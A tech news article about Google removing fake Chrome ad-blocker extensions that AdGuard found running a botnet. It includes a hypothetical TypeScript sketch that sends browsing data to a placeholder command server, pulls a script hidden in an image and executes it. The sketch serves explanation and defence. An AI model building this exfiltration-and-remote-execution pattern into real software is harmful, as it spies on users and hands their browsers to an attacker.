20 million Chrome users are fooled into downloading fake ad blockers

Google has removed a number of fake ad blockers from the Chrome Web Store after an AdGuard researcher discovered that the extensions concealed malicious scripts. The code hidden within these fake ad-blocking extensions was used to collect information about a user's browsing session and to change the browser's behavior.

Some of these extensions were popular, with one fake ad blocker garnering as many as 10 million downloads. Even the least popular extension, Webutation, had 30,000 downloads.

These malicious extensions simply copied legitimate ad-blocking code from real ad blockers and added their own harmful code on top.

"All the extensions I've highlighted are simple rip-offs with a few lines of code and some analytics code added by the 'authors,'" AdGuard's Andrey Meshkov wrote. "Instead of using tricky names they now spam keywords in the extension description trying to make [it] to the top search results."

Given that most casual users don't pay much attention to the name of an extension as long as it appears near the top of their search results, it's easy to deceive a large number of Chrome users into downloading fake ad blockers. Combined, all five of the flagged (and now removed) ad blockers generated 20 million downloads, according to AdGuard.

“Basically, this is a botnet composed of browsers infected with the fake adblock extensions. The browser will do whatever the command center server owner orders it to do,” he wrote.

The malicious code sends the data it collects, including your browsing information, to a remote server. The server then sends commands back to the extension, hidden inside an innocent-looking image, and the extension executes those commands as scripts that change the way your browser behaves.
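AdGuard's report doesn't publish the malware's source, but the general pattern Meshkov describes can be sketched. Below is a minimal, hypothetical TypeScript illustration of that command-and-control loop; the server address, the marker string, and all function names are invented for the example and are not taken from the actual extensions.

```ts
// Hypothetical sketch of the pattern AdGuard describes: the extension
// exfiltrates browsing data, fetches an innocent-looking image from the
// attacker's server, pulls a script hidden in the image bytes, and runs it.
// All endpoints and names here are placeholders, not the real malware.

const C2_SERVER = "https://example-c2.invalid"; // placeholder host

// 1. Report the user's browsing activity to the remote server.
async function reportBrowsingData(visitedUrl: string): Promise<void> {
  await fetch(`${C2_SERVER}/collect`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ visited: visitedUrl, ts: Date.now() }),
  });
}

// 2. Fetch an innocuous-looking image and extract a script hidden in it.
//    Here the payload is assumed to follow a known marker sequence; real
//    steganography would be far subtler.
async function fetchHiddenCommand(): Promise<string> {
  const res = await fetch(`${C2_SERVER}/banner.png`);
  const bytes = new Uint8Array(await res.arrayBuffer());
  // latin1 maps each byte to one character, so binary data survives
  // the scan for an ASCII marker.
  const text = new TextDecoder("latin1").decode(bytes);
  const marker = "/*CMD*/";
  const start = text.indexOf(marker);
  return start === -1 ? "" : text.slice(start + marker.length);
}

// 3. Execute whatever the server sent as a script, changing browser
//    behavior on command. Evaluating remote code like this is exactly
//    what turns each infected browser into a botnet node.
async function pollAndExecute(): Promise<void> {
  const script = await fetchHiddenCommand();
  if (script) {
    new Function(script)();
  }
}
```

The key point of the sketch is the last step: because the extension evaluates whatever arrives from the server, its behavior can be changed at any time after installation, which is why Meshkov characterizes the infected browsers as a botnet.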

To protect yourself, AdGuard recommends that you only download browser extensions from trusted authors and companies. If you don’t know the author, Meshkov recommends skipping the extension. Even if the extension comes from a trusted author, the software could be sold to another party in the future, which could then change the intended use or behavior of the extension.

If you're looking for an ad blocker, be sure to check out our list of recommendations for some of the best ad-blocking extensions.
